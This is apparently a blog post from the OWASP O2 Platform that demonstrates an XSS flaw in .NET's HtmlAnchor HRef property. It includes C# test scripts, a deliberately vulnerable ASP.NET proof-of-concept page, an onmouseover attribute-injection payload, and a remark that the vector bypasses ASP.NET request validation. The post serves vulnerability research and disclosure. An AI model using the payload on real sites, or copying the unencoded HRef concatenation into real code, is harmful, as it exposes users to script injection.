OWASP O2 Platform Blog

Checking if .NET’s HtmlAnchor Href property is vulnerable to XSS

I was reviewing an app’s code and it looked like there was an XSS injection vector into .NET’s built-in HtmlAnchor Href property.

To make sure this happened, I quickly wrote the following script which allowed me to confirm that YES that property is vulnerable to XSS:

var stringWriter = new System.IO.StringWriter();
var htmlTextWriter  =  new HtmlTextWriter(stringWriter);
var htmlAnchor = new System.Web.UI.HtmlControls.HtmlAnchor();
htmlAnchor.Title ="title";
htmlAnchor.HRef ="sadfasdf'<>\">aaa";

htmlAnchor.RenderControl(htmlTextWriter); 
//htmlAnchor.details();
return stringWriter.str();
//using System.Web.UI;

On the screenshot below you can see that none of the chars were encoded:

So the result in the 'Output' window shows that the value put on htmlAnchor.HRef (the payload "sadfasdf'<>\">aaa") is not encoded.

To really test this, let's try it on a web page.

This next script will put the payload on an IE object:

var topPanel = panel.clear().add_Panel();
var ie = topPanel.add_IE().silent(true);
var stringWriter = new System.IO.StringWriter();
var htmlTextWriter  =  new HtmlTextWriter(stringWriter);

var htmlAnchor = new System.Web.UI.HtmlControls.HtmlAnchor();

htmlAnchor.Title ="title";
htmlAnchor.HRef ="http://www.google.com'<>\">aaa";

htmlAnchor.RenderControl(htmlTextWriter); 
 
ie.open("about:blank");
var html = "<html><body><h1>XSS on HtmlAnchor Href tag</h1>" +
           "before anchor<br/>" +
           stringWriter.str() +
           "<br/>after anchor</body></html>";
ie.html(html); 

//using System.Web.UI;
//using O2.XRules.Database.Utils.O2
//O2File:WatiN_IE_ExtensionMethods.cs
//O2Ref:WatiN.Core.1x.dll
//O2Ref:Microsoft.mshtml.dll

which looks like this:

Note how the payload in the HTML anchor breaks the HTML element and is shown on the page.

To really check if this is a problem, let's try this on a real ASP.NET page.

For that, open the Util – Aspx PoC Builder.h2 script, which you can find here:

… and looks like this when opened:

This control will fire up a local web server (on the directory specified on the left) and will give us a quick way to write ASP.NET PoCs.

For this example, let's create a file called AnchorTag.aspx in an ASP.NET Controls folder

… and use the content from http://www.w3schools.com/aspnet/showasp.asp?filename=demo_htmlanchor with a small modification: on line 4 add ?value=" + Request("payload") to the HRef value (so that we can supply a payload via the query string or a POST request)

link1.HRef="http://www.w3schools.com/?value=" + Request("payload")

This is what it looks like when executed:

We can now add a variable called payload to the QueryString :

… which, if it contains a " and a >, will break the HTML anchor element

 

Since, when we are inside an HTML attribute, the " (and an =) is all we need to put in an XSS payload, we can pop up an alert using " onmouseover="alert(12)
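The same rendering test, extended to compare the concatenation used in AnchorTag.aspx with a hardened form that percent-encodes the query-string value before it reaches HRef. This is an added example, not code from the original post; it assumes a .NET Framework console project that references System.Web, and the class and helper names (AnchorHrefDemo, Render, SafeHref, HasInjectedHandler) are hypothetical.

```csharp
// Added example (not from the original post). Console app on .NET Framework
// with a reference to System.Web; class and helper names are hypothetical.
using System;
using System.IO;
using System.Web.UI;
using System.Web.UI.HtmlControls;

static class AnchorHrefDemo
{
    // Render an HtmlAnchor to a string, as the post's first script does.
    static string Render(string href)
    {
        using (var stringWriter = new StringWriter())
        using (var htmlTextWriter = new HtmlTextWriter(stringWriter))
        {
            var anchor = new HtmlAnchor { Title = "title", HRef = href };
            anchor.RenderControl(htmlTextWriter);
            htmlTextWriter.Flush();
            return stringWriter.ToString();
        }
    }

    // Percent-encode the untrusted value as query-string data before it is
    // concatenated into the URL, so '"', '<', '>' and spaces never reach HRef raw.
    static string SafeHref(string baseUrl, string untrusted)
    {
        return baseUrl + Uri.EscapeDataString(untrusted ?? string.Empty);
    }

    // True when the rendered markup carries an injected event-handler attribute.
    static bool HasInjectedHandler(string html)
    {
        return html.IndexOf(" onmouseover=\"", StringComparison.OrdinalIgnoreCase) >= 0;
    }

    static void Main()
    {
        const string baseUrl = "http://www.w3schools.com/?value=";
        const string payload = "\" onmouseover=\"alert(12)"; // payload quoted in the post

        string concatenated = Render(baseUrl + payload);     // pattern from AnchorTag.aspx
        string encoded = Render(SafeHref(baseUrl, payload)); // hardened form

        Console.WriteLine("concatenated: " + concatenated);
        Console.WriteLine("  injected handler: " + HasInjectedHandler(concatenated));
        Console.WriteLine("encoded:      " + encoded);
        Console.WriteLine("  injected handler: " + HasInjectedHandler(encoded));
    }
}
```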

Bypassing ASP.NET Validation

What is interesting (and dangerous) about this exploit vector is that it bypasses ASP.NET validation.

For example, if we use a payload that has a valid HTML tag (payload="aaaa"> <h1>XSS</h1>), we will get this error:

November 6, 2011 - Posted by | .NET, ASP.NET Controls, IE Automation, Vulnerabilities, XSS
